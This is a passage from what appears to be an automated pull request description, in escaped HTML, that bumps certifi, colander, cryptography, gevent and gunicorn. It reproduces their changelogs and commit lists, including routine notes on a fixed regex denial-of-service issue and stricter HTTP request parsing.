href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2015.09.06.2...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `colander` from 1.0 to 1.7.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Pylons/colander/blob/main/CHANGES.rst\"\u003ecolander's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.7.0 (2019-02-01)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe URL validator regex has been updated to no longer be vulnerable to a\ncatastrophic backtracking that would have led to an infinite loop. See\n\u003ca href=\"https://redirect.github.com/Pylons/colander/pull/323\"\u003ePylons/colander#323\u003c/a\u003e and\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/290\"\u003ePylons/colander#290\u003c/a\u003e. With thanks to Przemek\n(\u003ca href=\"https://github.com/p-m-k\"\u003ehttps://github.com/p-m-k\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eThis does change the behaviour of the URL validator and it no longer supports\n\u003ccode\u003efile://\u003c/code\u003e URI scheme (\u003ca href=\"https://tools.ietf.org/html/rfc8089\"\u003ehttps://tools.ietf.org/html/rfc8089\u003c/a\u003e). Users that\nwish to validate \u003ccode\u003efile://\u003c/code\u003e URI's should change their validator to use\n\u003ccode\u003ecolander.file_uri\u003c/code\u003e instead.\u003c/p\u003e\n\u003cp\u003eIt has also dropped support for alternate schemes outside of http/ftp (and\ntheir secure equivelants). Please let us know if we need to relax this\nrequirement.\u003c/p\u003e\n\u003cp\u003eCVE-ID: CVE-2017-18361\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eThe Email validator has been updated to use the same regular expression that\nis used by the WhatWG HTML specification, thereby increasing the email\naddresses that will validate correctly from web forms submitted. See\n\u003ca href=\"https://redirect.github.com/Pylons/colander/pull/324\"\u003ePylons/colander#324\u003c/a\u003e and\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/283\"\u003ePylons/colander#283\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eNumber once again will allow you to serialize None to colander.null, this\nreverts an accidental revert. See\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/204#issuecomment-459556100\"\u003ePylons/colander#204\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eInteger SchemaType now supports an optional \u003ccode\u003estrict\u003c/code\u003e mode that will\nvalidate that the number is an integer, rather than silently accepting floats\nand truncating. See \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/322\"\u003ePylons/colander#322\u003c/a\u003e and\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/292\"\u003ePylons/colander#292\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.6.0 (2019-01-31)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport custom format strings on \u003ccode\u003eDateTime\u003c/code\u003e and \u003ccode\u003eDate\u003c/code\u003e fields.\nSee \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/318\"\u003ePylons/colander#318\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport sub-second precision on \u003ccode\u003eTime\u003c/code\u003e fields if provided.\nSee \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/319\"\u003ePylons/colander#319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFormat Python code of \u003ccode\u003ecolander\u003c/code\u003e to conform to the PEP 8 style guide.\nAdd some linters (\u003ccode\u003eflake8\u003c/code\u003e, \u003ccode\u003eblack\u003c/code\u003e and other) into \u003ccode\u003etox.ini\u003c/code\u003e.\nSee \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/320\"\u003ePylons/colander#320\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.5.1 (2018-09-10)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/db25f7735a17c999f29545fc86d09d51508883e0\"\u003e\u003ccode\u003edb25f77\u003c/code\u003e\u003c/a\u003e prep 1.7.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/76ae86772c6e7d22023ecb0ffb5e3193f1a3dbd9\"\u003e\u003ccode\u003e76ae867\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/322\"\u003e#322\u003c/a\u003e from Pylons/feature/Integer-strict\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/98805557c10ab5ff3016ed09aa2d48c49b9df40b\"\u003e\u003ccode\u003e9880555\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/323\"\u003e#323\u003c/a\u003e from Pylons/fix/url-validator-dos\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/f22fcb9155852ca7f52bf5990a453d76d0b18204\"\u003e\u003ccode\u003ef22fcb9\u003c/code\u003e\u003c/a\u003e Add CHANGES.rst for \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/322\"\u003e#322\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/b6fe94f97160e897144437d87a5b39ce968b1b36\"\u003e\u003ccode\u003eb6fe94f\u003c/code\u003e\u003c/a\u003e Update docstring with info about strict\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/08c95b8599aae14f5fa5bbe4e6ec80b96a8c8e4a\"\u003e\u003ccode\u003e08c95b8\u003c/code\u003e\u003c/a\u003e Add a strict mode to Integer\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/2ba8973a5fa669609fa59a3e98f64fd832036a1f\"\u003e\u003ccode\u003e2ba8973\u003c/code\u003e\u003c/a\u003e Add CHANGES.rst for \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/323\"\u003e#323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/0d22a9a15f4d3c615528088e033226ee284e01e0\"\u003e\u003ccode\u003e0d22a9a\u003c/code\u003e\u003c/a\u003e Add tests for file_uri validator\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046\"\u003e\u003ccode\u003e1a17b23\u003c/code\u003e\u003c/a\u003e Add new file_uri validator\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/7ccafc2909bfbc5a592dc5abd944ef9960c35b35\"\u003e\u003ccode\u003e7ccafc2\u003c/code\u003e\u003c/a\u003e Update tests for url validator\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Pylons/colander/compare/1.0...1.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cryptography` from 1.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/1.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gevent` from 1.1b5 to 23.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gevent/gevent/releases\"\u003egevent's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.2.2\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003e1.1.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePython 2: \u003ccode\u003esendall\u003c/code\u003e on a non-blocking socket could spuriously fail\nwith a timeout.\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003esys.stderr\u003c/code\u003e has been monkey-patched (not recommended),\nexceptions that the hub reports aren't lost and can still be caught.\nReported in :issue:\u003ccode\u003e825\u003c/code\u003e by Jelle Smet.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eselectors.SelectSelector\u003c/code\u003e is properly monkey-patched\nregardless of the order of imports. Reported in :issue:\u003ccode\u003e835\u003c/code\u003e by\nPrzemysław Węgrzyn.\u003c/li\u003e\n\u003cli\u003ePython 2: \u003ccode\u003ereload(site)\u003c/code\u003e no longer fails with a \u003ccode\u003eTypeError\u003c/code\u003e if\ngevent has been imported. Reported in :issue:\u003ccode\u003e805\u003c/code\u003e by Jake Hilton.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.1.1 (Apr 4, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNested callbacks that set and clear an Event no longer cause\n\u003ccode\u003ewait\u003c/code\u003e to return prematurely. Reported in :issue:\u003ccode\u003e771\u003c/code\u003e by Sergey\nVasilyev.\u003c/li\u003e\n\u003cli\u003eFix build on Solaris 10. Reported in :issue:\u003ccode\u003e777\u003c/code\u003e by wiggin15.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eref\u003c/code\u003e parameter to :func:\u003ccode\u003egevent.os.fork_and_watch\u003c/code\u003e was being ignored.\u003c/li\u003e\n\u003cli\u003ePython 3: :class:\u003ccode\u003egevent.queue.Channel\u003c/code\u003e is now correctly iterable, instead of\nraising a :exc:\u003ccode\u003eTypeError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ePython 3: Add support for :meth:\u003ccode\u003esocket.socket.sendmsg\u003c/code\u003e,\n:meth:\u003ccode\u003esocket.socket.recvmsg\u003c/code\u003e and :meth:\u003ccode\u003esocket.socket.recvmsg_into\u003c/code\u003e\non platforms where they are defined. Initial :pr:\u003ccode\u003e773\u003c/code\u003e by Jakub\nKlama.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3: A monkey-patched :class:\u003ccode\u003ethreading.RLock\u003c/code\u003e now properly\nblocks (or deadlocks) in \u003ccode\u003eacquire\u003c/code\u003e if the default value for\n\u003cem\u003etimeout\u003c/em\u003e of -1 is used (which differs from gevent's default of\nNone). The \u003ccode\u003eacquire\u003c/code\u003e method also raises the same :exc:\u003ccode\u003eValueError\u003c/code\u003e\nexceptions that the standard library does for invalid parameters.\nReported in \u003ca href=\"https://redirect.github.com/gevent/gevent/issues/750\"\u003e#750\u003c/a\u003e by Joy Zheng.\u003c/li\u003e\n\u003cli\u003eFix a race condition in :class:\u003ccode\u003e~gevent.event.Event\u003c/code\u003e that made it\nreturn \u003ccode\u003eFalse\u003c/code\u003e when the event was set and cleared by the same\ngreenlet before allowing a switch to already waiting greenlets. (Found\nby the 3.4 and 3.5 standard library test suites; the same as Python\n\u003ccode\u003ebug 13502\u003c/code\u003e_. Note that the Python 2 standard library still has this\nrace condition.)\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003e~gevent.event.Event\u003c/code\u003e and :class:\u003ccode\u003e~.AsyncResult\u003c/code\u003e now wake\nwaiting greenlets in the same (unspecified) order. Previously,\n\u003ccode\u003eAsyncResult\u003c/code\u003e tended to use a FIFO order, but this was never\nguaranteed. Both classes also use less per-instance memory.\u003c/li\u003e\n\u003cli\u003eUsing a :class:\u003ccode\u003e~logging.Logger\u003c/code\u003e as a :mod:\u003ccode\u003epywsgi\u003c/code\u003e error or request\nlog stream no longer produces extra newlines. Reported in\n\u003ca href=\"https://redirect.github.com/gevent/gevent/issues/756\"\u003e#756\u003c/a\u003e by ael-code.\u003c/li\u003e\n\u003cli\u003eWindows: Installing from an sdist (.tar.gz) on PyPI no longer\nrequires having Cython installed first. (Note that the binary installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gevent/gevent/blob/master/docs/changelog_1_1.rst\"\u003egevent's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e==================\nChanges for 1.1\u003c/h1\u003e\n\u003cp\u003e.. currentmodule:: gevent\u003c/p\u003e\n\u003ch1\u003e1.1.2 (Jul 21, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003ePython 2: \u003ccode\u003esendall\u003c/code\u003e on a non-blocking socket could spuriously fail\nwith a timeout.\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003esys.stderr\u003c/code\u003e has been monkey-patched (not recommended),\nexceptions that the hub reports aren't lost and can still be caught.\nReported in :issue:\u003ccode\u003e825\u003c/code\u003e by Jelle Smet.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eselectors.SelectSelector\u003c/code\u003e is properly monkey-patched\nregardless of the order of imports. Reported in :issue:\u003ccode\u003e835\u003c/code\u003e by\nPrzemysław Węgrzyn.\u003c/li\u003e\n\u003cli\u003ePython 2: \u003ccode\u003ereload(site)\u003c/code\u003e no longer fails with a \u003ccode\u003eTypeError\u003c/code\u003e if\ngevent has been imported. Reported in :issue:\u003ccode\u003e805\u003c/code\u003e by Jake Hilton.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.1.1 (Apr 4, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNested callbacks that set and clear an Event no longer cause\n\u003ccode\u003ewait\u003c/code\u003e to return prematurely. Reported in :issue:\u003ccode\u003e771\u003c/code\u003e by Sergey\nVasilyev.\u003c/li\u003e\n\u003cli\u003eFix build on Solaris 10. Reported in :issue:\u003ccode\u003e777\u003c/code\u003e by wiggin15.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eref\u003c/code\u003e parameter to :func:\u003ccode\u003egevent.os.fork_and_watch\u003c/code\u003e was being ignored.\u003c/li\u003e\n\u003cli\u003ePython 3: :class:\u003ccode\u003egevent.queue.Channel\u003c/code\u003e is now correctly iterable, instead of\nraising a :exc:\u003ccode\u003eTypeError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ePython 3: Add support for :meth:\u003ccode\u003esocket.socket.sendmsg\u003c/code\u003e,\n:meth:\u003ccode\u003esocket.socket.recvmsg\u003c/code\u003e and :meth:\u003ccode\u003esocket.socket.recvmsg_into\u003c/code\u003e\non platforms where they are defined. Initial :pr:\u003ccode\u003e773\u003c/code\u003e by Jakub\nKlama.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.1.0 (Mar 5, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3: A monkey-patched :class:\u003ccode\u003ethreading.RLock\u003c/code\u003e now properly\nblocks (or deadlocks) in \u003ccode\u003eacquire\u003c/code\u003e if the default value for\n\u003cem\u003etimeout\u003c/em\u003e of -1 is used (which differs from gevent's default of\nNone). The \u003ccode\u003eacquire\u003c/code\u003e method also raises the same :exc:\u003ccode\u003eValueError\u003c/code\u003e\nexceptions that the standard library does for invalid parameters.\nReported in :issue:\u003ccode\u003e750\u003c/code\u003e by Joy Zheng.\u003c/li\u003e\n\u003cli\u003eFix a race condition in :class:\u003ccode\u003e~gevent.event.Event\u003c/code\u003e that made it\nreturn \u003ccode\u003eFalse\u003c/code\u003e when the event was set and cleared by the same\ngreenlet before allowing a switch to already waiting greenlets. (Found\nby the 3.4 and 3.5 standard library test suites; the same as Python\n\u003ccode\u003ebug 13502\u003c/code\u003e_. Note that the Python 2 standard library still has this\nrace condition.)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/gevent/gevent/commits/23.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gunicorn` from 19.2.1 to 23.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/benoitc/gunicorn/releases\"\u003egunicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e23.0.0\u003c/h2\u003e\n\u003cp\u003eGunicorn 23.0.0 has been released. This version improve HTTP 1.1. support and  which improve safety\u003c/p\u003e\n\u003cp\u003eYou're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003ch1\u003e23.0.0 - 2024-08-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eminor docs fixes (:pr:\u003ccode\u003e3217\u003c/code\u003e, :pr:\u003ccode\u003e3089\u003c/code\u003e, :pr:\u003ccode\u003e3167\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eworker_class parameter accepts a class (:pr:\u003ccode\u003e3079\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003efix deadlock if request terminated during chunked parsing (:pr:\u003ccode\u003e2688\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit receiving Transfer-Encodings: compress, deflate, gzip (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit Transfer-Encoding headers specifying multiple encodings. note: no parameters, still (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003esdist generation now explicitly excludes sphinx build folder (:pr:\u003ccode\u003e3257\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003edecode bytes-typed status (as can be passed by gevent) as utf-8 instead of raising \u003ccode\u003eTypeError\u003c/code\u003e (:pr:\u003ccode\u003e2336\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eraise correct Exception when encounting invalid chunked requests (:pr:\u003ccode\u003e3258\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003ethe SCRIPT_NAME and PATH_INFO headers, when received from allowed forwarders, are no longer restricted for containing an underscore (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003einclude IPv6 loopback address \u003ccode\u003e[::1]\u003c/code\u003e in default for :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e and :ref:\u003ccode\u003eproxy-allow-ips\u003c/code\u003e (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** NOTE **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SCRIPT_NAME change mitigates a regression that appeared first in the 22.0.0 release\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e setting if you are still not seeing the SCRIPT_NAME transmitted\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarder-headers\u003c/code\u003e setting if you are missing headers after upgrading from a version prior to 22.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** Breaking changes **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefuse requests where the uri field is empty (:pr:\u003ccode\u003e3255\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003erefuse requests with invalid CR/LR/NUL in heade field values (:pr:\u003ccode\u003e3253\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eremove temporary \u003ccode\u003e--tolerate-dangerous-framing\u003c/code\u003e switch from 22.0 (:pr:\u003ccode\u003e3260\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eIf any of the breaking changes affect you, be aware that now refused requests can post a security problem, especially so in setups involving request pipe-lining and/or proxies.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFix 